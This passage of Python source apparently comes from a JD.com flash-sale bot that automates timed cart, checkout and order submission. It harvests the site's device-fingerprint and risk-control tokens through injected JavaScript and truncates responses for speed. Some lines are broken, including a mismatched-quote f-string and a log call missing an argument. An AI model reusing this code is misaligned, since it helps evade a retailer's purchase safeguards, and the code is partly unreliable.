p[r.name] = r # }); # if (e.laProducts.length > 0) # (0, # D.default)(y = oe.largeShipments).call(y, function(a) { # var r = new a(e,n,t,h,i); # r.supported ? (u[r.name] = r, # b = !0) : p[r.name] = r # }); # if (e.laProducts.length > 0) { # var w = new U.default(e,n,t,h,i); # w.supported && !b ? u[w.name] = w : p[w.name] = w # } break elif shipType == '7': # if ("1" == n.supported) { # var S = new G.default(e,n,t,h,i); # S.supported ? u[S.name] = S : p[S.name] = S # } break elif shipType == '8': # var x = new F.default(e,n,t,h,i); # x.supported && (u[x.name] = x); break elif shipType == '9': # var P = new M.default(e,n,t,h,i); # P.supported ? u[P.name] = P : p[P.name] = P; break elif shipType == '10': # var j = new H.default(e,n,t,h,i); # j.supported ? 
u[j.name] = j : p[j.name] = j break # else: # break # if not shipmentData: # raise AsstException('抢购失败,无法获取订单页收获地址数据,本次抢购结束') # exit(-1) if shipmentData.get('selected') != '1': raise AsstException('抢购失败,订单页收获地址未自动选择,本次抢购结束') exit(-1) ship_list = None promise_uuid_index = None if shipType == '0': ship_list = [''] * 25 promise_uuid_index = 22 elif shipType == '1': ship_list = [''] * 9 promise_uuid_index = 7 elif shipType == '2' \ or shipType == '5' \ or shipType == '9': ship_list = [''] * 20 promise_uuid_index = 17 elif shipType == '8': ship_list = [''] * 10 promise_uuid_index = 8 elif shipType == '10': ship_list = [''] * 5 promise_uuid_index = 4 else: ship_list = [''] * 25 promise_uuid_index = 22 shipId = shipmentData.get('id') ship_list[0] = shipType ship_list[1] = shipId if shipType in ['1', '2', '5', '9', '10']: ship_list[2] = venderId elif shipType == '8': ship_list[2] = '0' else: ship_list[17] = '0' ship_list[promise_uuid_index] = promise_uuid if shipType == '0': # 处理shipName if shipName == 'jd311': ship_list[2] = '4' ship_list[7] = '1' ship_list[9] = shipmentData.get('promiseDate') ship_list[10] = shipmentData.get('promiseTimeRange') ship_list[11] = shipmentData.get('promiseSendPay') ship_list[12] = shipmentData.get('batchId') ship_list[20] = '' elif shipName == 'jdjzd': ship_list[2] = '6' ship_list[7] = '3' ship_list[9] = shipmentData.get('promiseDate') ship_list[10] = shipmentData.get('promiseTimeRange') ship_list[11] = shipmentData.get('promiseSendPay') ship_list[12] = shipmentData.get('batchId') # t.calendarTag ship_list[18] = '' # t.calendarTag # && t.calendarTag.length # && (0, r.default)(y=t.calendarTag).call(y, function(e){return e.selected}).tagType || "" ship_list[20] = '' elif shipName == 'jd411': ship_list[2] = '5' ship_list[7] = '2' ship_list[11] = shipmentData.get('promiseSendPay') ship_list[5] = '0' ship_list[19] = '0' ship_list[21] = '0' ship_list[24] = '' elif shipType == '2': if shipmentData: ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = shipmentData.get('promiseTimeRange') ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' elif shipType == '3' \ or shipType == '6': pass elif shipType == '5': if shipmentData: ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = shipmentData.get('promiseTimeRange') ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' ship_list[15] = "1" if "shipsopjzd" == shipName: ship_list[15] = "2" ship_list[16] = ''# t.calendarTag # && t.calendarTag.length # && (0, c.default)(w=t.calendarTag).call(w, function(e){return e.selected}).tagType | | ""; ship_list[13] = '0' ship_list[19] = '' elif shipType == '7': pass elif shipType == '8': if shipmentData: timeRange = shipmentData.get('promiseTimeRange') ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = timeRange ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') if '立即送达' in timeRange: ship_list[7] = '1' else: ship_list[7] = '2' else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' elif shipType == '9': if shipmentData: timeRange = shipmentData.get('promiseTimeRange') ship_list[3] = shipmentData.get('promiseDate') if '下单' in timeRange: ship_list[4] = '立即送达' elif timeRange: ship_list[4] = timeRange else: ship_list[4] = '' ship_list[5] = 
shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') if '下单' in timeRange: ship_list[14] = '1' elif timeRange: ship_list[14] = '2' else: ship_list[14] = '' else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' ship_list[14] = '' elif shipType == '10': pass else: pass params_list.append(f'&ship={parse.quote('|'.join(ship_list), safe='{|,:}")}') submit_data = ''.join(params_list) if submit_data: # 保存submit_data self.get_submit_data[sku_id] = submit_data return submit_data def submit_order_request(submit_data, count): # 新提交订单请求 logger.info('提交订单请求') submit_data = f'{submit_data}&r={random.random()}&callback=confirmCb{self.letterMap[count]}' get_confirm_order_headers['Referer'] = self.get_submit_referer.get(sku_id) try: resp = http_util.send_http_request(self.socket_client, url='https://wq.jd.com/deal/msubmit/confirm', method='GET', headers=get_confirm_order_headers, cookies=self.get_cookies_str_by_domain_or_path('wq.jd.com'), params=submit_data) response_data = resp.body if resp.status == requests.codes.OK: if response_data: if '"errId":"0"' in response_data: logger.info('订单提交完成,在手机APP中可以查看是否完成下单') return True else: logger.info('订单提交失败') logger.info(f'响应数据:\n{response_data}') return False else: logger.info('订单提交失败,响应码:%s', resp.status) return False else: logger.info('订单提交失败,响应码:%s', resp.status) logger.info(f'响应数据:\n{response_data}') return False except Exception as e: logger.error(e) return False else: def get_confirm_order_page_request(sku_id, server_buy_time=int(time.time())): exit(-1) def submit_order_request(submit_data, count): exit(-1) self.request_info['get_confirm_order_page_request'] = get_confirm_order_page_request self.request_info['submit_order_request'] = submit_order_request return server_buy_time, realy_buy_time @check_login def buy_item_in_stock(self, sku_ids, area, wait_all=False, stock_interval=3, submit_retry=3, submit_interval=5): """根据库存自动下单商品 :param sku_ids: 商品id。可以设置多个商品,也可以带数量,如:'1234' 或 '1234,5678' 或 '1234:2' 或 '1234:2,5678:3' :param area: 地区id :param wait_all: 是否等所有商品都有货才一起下单,可选参数,默认False :param stock_interval: 查询库存时间间隔,可选参数,默认3秒 :param submit_retry: 提交订单失败后重试次数,可选参数,默认3次 :param submit_interval: 提交订单失败后重试时间间隔,可选参数,默认5秒 :return: """ items_dict = parse_sku_id(sku_ids) items_list = list(items_dict.keys()) area_id = parse_area_id(area=area) if not wait_all: logger.info('下单模式:%s 任一商品有货并且未下架均会尝试下单', items_list) while True: for (sku_id, count) in items_dict.items(): if not self.if_item_can_be_ordered(sku_ids={sku_id: count}, area=area_id): logger.info('%s 不满足下单条件,%ss后进行下一次查询', sku_id, stock_interval) else: logger.info('%s 满足下单条件,开始执行', sku_id) self._cancel_select_all_cart_item() self._add_or_change_cart_item(self.get_cart_detail(), sku_id, count) if self.submit_order_with_retry(submit_retry, submit_interval): return time.sleep(stock_interval) else: logger.info('下单模式:%s 所有都商品同时有货并且未下架才会尝试下单', items_list) while True: if not self.if_item_can_be_ordered(sku_ids=sku_ids, area=area_id): logger.info('%s 不满足下单条件,%ss后进行下一次查询', items_list, stock_interval) else: logger.info('%s 满足下单条件,开始执行', items_list) self._cancel_select_all_cart_item() shopping_cart = self.get_cart_detail() for (sku_id, count) in items_dict.items(): self._add_or_change_cart_item(shopping_cart, sku_id, count) if self.submit_order_with_retry(submit_retry, submit_interval): return time.sleep(stock_interval) @check_login def exec_reserve_seckill_by_time(self, config): """定时抢购`预约抢购商品` 一定要确保预约的商品在购物车中才能使用这种方式!!!否则只能用其他方式 预约抢购商品特点: 1.需要提前点击预约 
2.大部分此类商品在预约后自动加入购物车,在购物车中可见但无法勾选✓,也无法进入到结算页面(重要特征) 3.到了抢购的时间点后,才能勾选并结算下单 注意: 1.请在抢购开始前手动清空购物车中此类无法勾选的商品!(因为脚本在执行清空购物车操作时,无法清空不能勾选的商品) """ if not config: raise AsstException('初始化配置为空!') self.config = config # 开抢前清空购物车 self.clear_cart() sku_id = config.sku_id area_id = parse_area_id(self.area_id) cat = self.item_cat.get(sku_id) retry_count = 0 while not cat: retry_count += 1 logger.info('第 %s 次获取商品页信息', retry_count) page = self._get_item_detail_page(sku_id) if not self.parse_item_detail_page(sku_id, page): if retry_count > 10: logger.error('无法获取cat,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次获取商品页信息失败:%s', page) time.sleep(1) continue else: cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) # special_attrs = self.special_attrs.get(sku_id) # [前置]初始化预约抢购时间 server_buy_time, realy_buy_time = self.init_yuyue_buy_time(sku_id, self.headers.copy(), { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, }) # 1.初始化正常下单流程请求信息、方法 self.init_default_order_request_method(config.fast_mode, config.is_risk_control) def start_func(): # 3.执行 if config.is_pass_cart is not True: sku_ids = {config.sku_id: config.num} add_cart_request = self.request_info['add_cart_request'] for sku_id, count in parse_sku_id(sku_ids=sku_ids).items(): payload = { 'pid': sku_id, 'pcount': count, 'ptype': 1, } add_cart_request(payload) # 获取订单结算页面信息 self.get_checkout_page_detail() retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') self.start_func = start_func # 2.倒计时 logger.info('准备抢购商品id为:%s', config.sku_id) Timer(buy_time=realy_buy_time, sleep_interval=config.sleep_interval, fast_sleep_interval=config.fast_sleep_interval, is_sync=False, assistant=self).start() if self.config.fast_mode: self.close_now() # 初始化下单必须参数 def init_order_request_info(self): # 获取下单必须参数 br = self.br # 获取:ipLoc-djd、ipLocation if address_util.get_user_address(self) is not True: logger.error('获取地址信息失败,请重试!') exit(-1) if self.use_new: # 获取:eid、fp、jstub、token、sdkToken(默认为空) def jsCallback(data): # print(data) self.data = data if len(data) > 0: logger.info('自动初始化下单参数成功!') return True return False jsFunc = CustomBrowser.JsScript('return (function(){var obj={};for(var count=0;count<20;count++){' 'try{obj=getJdEid()}catch(e){count++;sleep(500)}};return obj})()', jsCallback) count = 0 while True: if br.openUrl('https://idt.jd.com/paypwd/toUpdateOrForget/', jsFunc): if not len(self.data) > 0: if count > 3: logger.error( '初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) else: break else: if count > 3: logger.error('初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) else: # 获取:eid、fp、track_id、risk_control(默认为空) def jsCallback(data): # print(data) eid = data['eid'] fp = data['fp'] track_id = data['trackId'] if eid: self.eid = eid if fp: self.fp = fp if track_id: self.track_id = track_id if eid and fp and track_id: logger.info('自动初始化下单参数成功!') return True return False jsFunc = CustomBrowser.JsScript('return (function(){var getCookie=function(name){' 'var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");' 'if(arr=document.cookie.match(reg)){return 
unescape(arr[2]);}else{return ' 'null;}},obj={eid:"",fp:"",trackId:""};for(var count=0;count<20;count++){' 'try{getJdEid(function(eid, fp, udfp){var trackId=getCookie("TrackID");' 'if(eid&&fp&&trackId){obj.eid=eid;obj.fp=fp;obj.trackId=trackId;return obj;}' 'else{count++;sleep(500)}})}catch(e){count++;sleep(500)}};return obj})()', jsCallback) # headers = { # # 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', # 'accept-encoding': 'gzip, deflate, br', # 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8', # 'cache-control': 'max-age=0', # 'dnt': '1', # 'sec-fetch-dest': 'document', # 'sec-fetch-mode': 'navigate', # 'sec-fetch-site': 'none', # 'sec-fetch-user': '?1', # 'upgrade-insecure-requests': '1', # } count = 0 while True: if br.openUrl('https://order.jd.com/center/list.action', jsFunc): if not self.eid or not self.fp or not self.track_id: if count > 3: logger.error( '初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) else: break else: if count > 3: logger.error('初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) if br: # 关闭浏览器 br.quit() def init_default_order_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() # config = self.config # 初始化添加购物车请求方法 add_cart_request_headers = self.headers.copy() if fast_mode: # add_cart_request_headers['cookie'] = cookie_str def add_cart_request(params): # 为提高性能,并发时先校验一次,不满足再进入锁 if not self.is_add_cart_request.get(0): i = 0 while i < 3: with self.sem: # 进入锁后,需进行二次校验,要确保只请求了一次 if not self.is_add_cart_request.get(0): logger.info('添加购物车请求') try: def res_func(_conn): while True: data = _conn.recv(1) _conn.invalidate() logger.info('添加购物车请求已接收-为提高抢购速度,已截断响应数据') return None url = 'https://cart.jd.com/gate.action' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=add_cart_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'cart.jd.com'), params=params, res_func=res_func) self.is_add_cart_request[0] = True # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() break except Exception as e: i += 1 logger.error('添加购物车请求异常,开始第 %s 次重试,信息:%s', i, e) else: break else: def add_cart_request(params): i = 0 while i < 3: try: resp = self.sess.get(url='https://cart.jd.com/gate.action', headers=add_cart_request_headers, params=params, timeout=(0.2, 0.03)) if 'https://cart.jd.com/cart.action' in resp.url: # 套装商品加入购物车后直接跳转到购物车页面 result = True else: # 普通商品成功加入购物车后会跳转到提示 "商品已成功加入购物车!" 
页面 soup = BeautifulSoup(resp.text, "html.parser") result = bool(soup.select('h3.ftx-02')) # [<h3 class="ftx-02">商品已成功加入购物车!</h3>] if result: logger.info('%s 已成功加入购物车', params['pid']) break else: i += 1 logger.error('%s 添加购物车失败,开始第 %s 次重试', params['pid'], i) logger.error('响应数据:%s', resp) except requests.exceptions.ConnectTimeout as e: i += 1 logger.error('%s 添加购物车请求发送超时,开始第 %s 次重试', params['pid'], i) except requests.exceptions.ReadTimeout as e: logger.info('已发送添加到购物车请求,为提高抢购速度,已截断响应数据') break self.request_info['add_cart_request'] = add_cart_request get_checkout_page_request_headers = self.headers.copy() # 初始化订单结算页请求方法 if fast_mode and is_risk_control is False: # get_checkout_page_request_headers['cookie'] = cookie_str def get_checkout_page_request(params): logger.info('订单结算请求') i = 0 def res_func(conn): while True: data = conn.recv(1) conn.invalidate() logger.info('订单结算请求已接收-为提高抢购速度,已截断响应数据') return None if not self.is_get_checkout_page.get(0): while i < 3: try: url = 'https://trade.jd.com/shopping/order/getOrderInfo.action' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_checkout_page_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'trade.jd.com'), params=params, res_func=res_func) self.is_get_checkout_page[0] = True # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() break except Exception as e: i += 1 logger.error('订单结算请求错误,开始第 %s 次重试,信息:%s', i, e) else: def get_checkout_page_request(params): i = 0 resp = None while i < 3: try: # url = 'https://cart.jd.com/gotoOrder.action' resp = self.sess.get(url='https://trade.jd.com/shopping/order/getOrderInfo.action', headers=get_checkout_page_request_headers, params=params, timeout=(0.2, 0.07)) if not response_status(resp): logger.error('获取订单结算页信息失败') return soup = BeautifulSoup(resp.text, "html.parser") self.risk_control = get_tag_value(soup.select('input#riskControl'), 'value') # order_detail = { # 'address': soup.find('span', id='sendAddr').text[5:], # remove '寄送至: ' from the begin # 'receiver': soup.find('span', id='sendMobile').text[4:], # remove '收件人:' from the begin # 'total_price': soup.find('span', id='sumPayPriceId').text[1:], # remove '¥' from the begin # 'items': [] # } # T O D O: 这里可能会产生解析问题,待修复 # for item in soup.select('div.goods-list div.goods-items'): # div_tag = item.select('div.p-price')[0] # order_detail.get('items').append({ # 'name': get_tag_value(item.select('div.p-name a')), # 'price': get_tag_value(div_tag.select('strong.jd-price'))[2:], # remove '¥ ' from the begin # 'num': get_tag_value(div_tag.select('span.p-num'))[1:], # remove 'x' from the begin # 'state': get_tag_value(div_tag.select('span.p-state')) # in stock or out of stock # }) # logger.info("下单信息:%s", order_detail) # return order_detail return except requests.exceptions.ConnectTimeout as e: i += 1 logger.error('订单结算页面数据连接超时,开始第 %s 次重试', i) except requests.exceptions.ReadTimeout as e: logger.info('已发送订单结算请求,为提高抢购速度,已截断响应数据') break except Exception as e: logger.error('订单结算页面数据解析异常(可以忽略),报错信息:%s', e) if resp: logger.error('resp.text:%s', resp.text) break self.request_info['get_checkout_page_request'] = get_checkout_page_request # 初始化提交订单请求方法 submit_order_request_data = { 'overseaPurchaseCookies': '', 'vendorRemarks': '[]', 'submitOrderParam.sopNotPutInvoice': 'false', 'submitOrderParam.trackID': 'TestTrackId', 'submitOrderParam.ignorePriceChange': '0', 'submitOrderParam.btSupport': '0', 'riskControl': self.risk_control, 
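            # riskControl is scraped from the checkout page (input#riskControl) by
            # get_checkout_page_request above, and both submit branches refresh it again
            # right before posting, so the value captured here is only an initial default.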
'submitOrderParam.isBestCoupon': 1, 'submitOrderParam.jxj': 1, 'submitOrderParam.trackId': self.track_id, # T o d o: need to get trackId 'submitOrderParam.eid': self.eid, 'submitOrderParam.fp': self.fp, 'submitOrderParam.needCheck': 1 } submit_order_request_headers = { 'User-Agent': self.user_agent, 'Host': 'trade.jd.com', 'Referer': 'https://trade.jd.com/shopping/order/getOrderInfo.action' } # 如果有密码则设置 payment_pwd = global_config.get('account', 'payment_pwd') if payment_pwd: submit_order_request_data['submitOrderParam.payPassword'] = encrypt_payment_pwd(payment_pwd) if fast_mode: # submit_order_request_headers['cookie'] = cookie_str def submit_order_request(): submit_order_request_data['riskControl'] = self.risk_control logger.info('提交订单请求') try: resp = http_util.send_http_request(self.socket_client, url='https://trade.jd.com/shopping/order/submitOrder.action', method='POST', headers=submit_order_request_headers, cookies=self.get_cookies_str_by_domain_or_path('trade.jd.com'), data=submit_order_request_data) response_data = resp.body if response_data: try: resp_json = json.loads(response_data) if resp_json.get('success'): order_id = resp_json.get('orderId') logger.info('订单提交成功! 订单号:%s', order_id) if self.send_message: self.messenger.send(text='jd-assistant 订单提交成功', desp='订单号:%s' % order_id) return True else: message, result_code = resp_json.get('message'), resp_json.get('resultCode') if result_code == 0: message = message + '(下单失败)' # self._save_invoice() # message = message + '(下单商品可能为第三方商品,将切换为普通发票进行尝试)' elif result_code == 60077: message = message + '(可能是购物车为空 或 未勾选购物车中商品)' elif result_code == 60123: message = message + '(需要在config.ini文件中配置支付密码)' elif result_code == 600158: logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'很抱歉,您抢购的商品无货!本次抢购结束') return True logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'响应数据:\n{resp_json}') return False except Exception: logger.info('数据解析异常,响应数据:\n %s', response_data) return False else: logger.info('下单请求异常,无响应数据') return False except Exception as e: logger.error(e) return False else: def submit_order_request(): try: submit_order_request_data['riskControl'] = self.risk_control resp = self.sess.post(url='https://trade.jd.com/shopping/order/submitOrder.action', headers=submit_order_request_headers, data=submit_order_request_data) # 暂时不设置超时时间 # resp = self.sess.post(url=url, data=data, headers=headers, timeout=(0.1, 0.08)) resp_json = json.loads(resp.text) # 返回信息示例: # 下单失败 # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60123, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '请输入支付密码!'} # {'overSea': False, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'orderXml': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60017, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '您多次提交过快,请稍后再试'} # {'overSea': False, 'orderXml': None, 
'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60077, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '获取用户订单信息失败'} # {"cartXml":null,"noStockSkuIds":"xxx","reqInfo":null,"hasJxj":false,"addedServiceList":null,"overSea":false,"orderXml":null,"sign":null,"pin":"xxx","needCheckCode":false,"success":false,"resultCode":600157,"orderId":0,"submitSkuNum":0,"deductMoneyFlag":0,"goJumpOrderCenter":false,"payInfo":null,"scaleSkuInfoListVO":null,"purchaseSkuInfoListVO":null,"noSupportHomeServiceSkuList":null,"msgMobile":null,"addressVO":{"pin":"xxx","areaName":"","provinceId":xx,"cityId":xx,"countyId":xx,"townId":xx,"paymentId":0,"selected":false,"addressDetail":"xx","mobile":"xx","idCard":"","phone":null,"email":null,"selfPickMobile":null,"selfPickPhone":null,"provinceName":null,"cityName":null,"countyName":null,"townName":null,"giftSenderConsigneeName":null,"giftSenderConsigneeMobile":null,"gcLat":0.0,"gcLng":0.0,"coord_type":0,"longitude":0.0,"latitude":0.0,"selfPickOptimize":0,"consigneeId":0,"selectedAddressType":0,"siteType":0,"helpMessage":null,"tipInfo":null,"cabinetAvailable":true,"limitKeyword":0,"specialRemark":null,"siteProvinceId":0,"siteCityId":0,"siteCountyId":0,"siteTownId":0,"skuSupported":false,"addressSupported":0,"isCod":0,"consigneeName":null,"pickVOname":null,"shipmentType":0,"retTag":0,"tagSource":0,"userDefinedTag":null,"newProvinceId":0,"newCityId":0,"newCountyId":0,"newTownId":0,"newProvinceName":null,"newCityName":null,"newCountyName":null,"newTownName":null,"checkLevel":0,"optimizePickID":0,"pickType":0,"dataSign":0,"overseas":0,"areaCode":null,"nameCode":null,"appSelfPickAddress":0,"associatePickId":0,"associateAddressId":0,"appId":null,"encryptText":null,"certNum":null,"used":false,"oldAddress":false,"mapping":false,"addressType":0,"fullAddress":"xxxx","postCode":null,"addressDefault":false,"addressName":null,"selfPickAddressShuntFlag":0,"pickId":0,"pickName":null,"pickVOselected":false,"mapUrl":null,"branchId":0,"canSelected":false,"address":null,"name":"xxx","message":null,"id":0},"msgUuid":null,"message":"xxxxxx商品无货"} # {'orderXml': None, 'overSea': False, 'noStockSkuIds': 'xxx', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'cartXml': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 600158, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': {'oldAddress': False, 'mapping': False, 'pin': 'xxx', 'areaName': '', 'provinceId': xx, 'cityId': xx, 'countyId': xx, 'townId': xx, 'paymentId': 0, 'selected': False, 'addressDetail': 'xxxx', 'mobile': 'xxxx', 'idCard': '', 'phone': None, 'email': None, 'selfPickMobile': None, 'selfPickPhone': None, 'provinceName': None, 'cityName': None, 'countyName': None, 'townName': None, 'giftSenderConsigneeName': None, 'giftSenderConsigneeMobile': None, 'gcLat': 0.0, 'gcLng': 0.0, 'coord_type': 0, 'longitude': 0.0, 'latitude': 0.0, 'selfPickOptimize': 0, 'consigneeId': 0, 'selectedAddressType': 0, 'newCityName': None, 'newCountyName': None, 'newTownName': None, 
'checkLevel': 0, 'optimizePickID': 0, 'pickType': 0, 'dataSign': 0, 'overseas': 0, 'areaCode': None, 'nameCode': None, 'appSelfPickAddress': 0, 'associatePickId': 0, 'associateAddressId': 0, 'appId': None, 'encryptText': None, 'certNum': None, 'addressType': 0, 'fullAddress': 'xxxx', 'postCode': None, 'addressDefault': False, 'addressName': None, 'selfPickAddressShuntFlag': 0, 'pickId': 0, 'pickName': None, 'pickVOselected': False, 'mapUrl': None, 'branchId': 0, 'canSelected': False, 'siteType': 0, 'helpMessage': None, 'tipInfo': None, 'cabinetAvailable': True, 'limitKeyword': 0, 'specialRemark': None, 'siteProvinceId': 0, 'siteCityId': 0, 'siteCountyId': 0, 'siteTownId': 0, 'skuSupported': False, 'addressSupported': 0, 'isCod': 0, 'consigneeName': None, 'pickVOname': None, 'shipmentType': 0, 'retTag': 0, 'tagSource': 0, 'userDefinedTag': None, 'newProvinceId': 0, 'newCityId': 0, 'newCountyId': 0, 'newTownId': 0, 'newProvinceName': None, 'used': False, 'address': None, 'name': 'xx', 'message': None, 'id': 0}, 'msgUuid': None, 'message': 'xxxxxx商品无货'} # 下单成功 # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': True, 'resultCode': 0, 'orderId': 8740xxxxx, 'submitSkuNum': 1, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': None} if resp_json.get('success'): order_id = resp_json.get('orderId') logger.info('订单提交成功! 订单号:%s', order_id) if self.send_message: self.messenger.send(text='jd-assistant 订单提交成功', desp='订单号:%s' % order_id) return True else: message, result_code = resp_json.get('message'), resp_json.get('resultCode') if result_code == 0: message = message + '(下单失败)' # self._save_invoice() # message = message + '(下单商品可能为第三方商品,将切换为普通发票进行尝试)' elif result_code == 60077: message = message + '(可能是购物车为空 或 未勾选购物车中商品)' elif result_code == 60123: message = message + '(需要在config.ini文件中配置支付密码)' elif result_code == 600158: logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'很抱歉,您抢购的商品无货!本次抢购结束') return True logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'响应数据:\n{resp_json}') return False except Exception as e: logger.error(e) return False self.request_info['submit_order_request'] = submit_order_request def make_seckill_connect(self): # 获取商品抢购链接请求(多种,目前添加2种) self.socket_client.init_pool("itemko.jd.com", 443, 1, 20) self.socket_client.init_pool("item-soa.jd.com", 443, 1, 20) # 访问商品抢购链接请求 self.socket_client.init_pool("yushou.jd.com", 443, 1, 10) # 访问抢购订单结算页面请求方法 # 获取秒杀初始化信息请求 self.socket_client.init_pool("marathon.jd.com", 443, 1, 10) # 【兼容】购物车请求 self.socket_client.init_pool("cart.jd.com", 443, 1, 10) # 提交抢购(秒杀)订单请求 self.socket_client.init_pool("trade.jd.com", 443, 1, 10) def make_reserve_seckill_connect(self): self.socket_client.init_pool("cart.jd.com", 443, 1) self.socket_client.init_pool("trade.jd.com", 443, 1, 15) def connect_now(self): self.socket_client.connect() def close_now(self): self.socket_client.close_client() def get_and_update_cookies_str(self): cookie_array = [] for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') self.cookies_str = ''.join(cookie_array) return self.cookies_str def get_cookies_str_by_domain_or_path(self, domain=None, path=None): cookie_array = [] if domain is None: 
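        # Builds a raw "name=value;" Cookie header string from the requests session jar,
        # optionally filtered by cookie domain and/or exact cookie path; the raw socket
        # client cannot read the session jar itself, so requests sent through it receive
        # this string explicitly via the cookies= argument.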
            if path is None:
                for cookie in iter(self.sess.cookies):
                    cookie_array.append(f'{cookie.name}={cookie.value};')
            else:
                for cookie in iter(self.sess.cookies):
                    if cookie.path == path:
                        cookie_array.append(f'{cookie.name}={cookie.value};')
        elif path is None:
            if domain is None:
                for cookie in iter(self.sess.cookies):
                    cookie_array.append(f'{cookie.name}={cookie.value};')
            else:
                for cookie in iter(self.sess.cookies):
                    if cookie.domain in domain:
                        cookie_array.append(f'{cookie.name}={cookie.value};')
        else:
            for cookie in iter(self.sess.cookies):
                if (cookie.domain in domain) and (cookie.path == path):
                    cookie_array.append(f'{cookie.name}={cookie.value};')
        return ''.join(cookie_array)

    def start_by_config(self, config=global_config):
        if config.select_mode == 1:  # 执行【预约抢购,不会自动加入购物车】
            self.exec_seckill_by_time(config)
        elif config.select_mode == 2:  # 执行【预约抢购,自动加入购物车】手动清空自动添加到购物车的
            self.exec_reserve_seckill_by_time(config)
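# --------------------------------------------------------------------------
# A minimal standalone sketch of the cookie-filtering idea used by
# get_cookies_str_by_domain_or_path above: join the cookies of a requests
# session into a 'name=value;' header string, optionally restricted by domain
# and path. The helper name build_cookie_header is made up for this sketch
# and is not an interface of this project.
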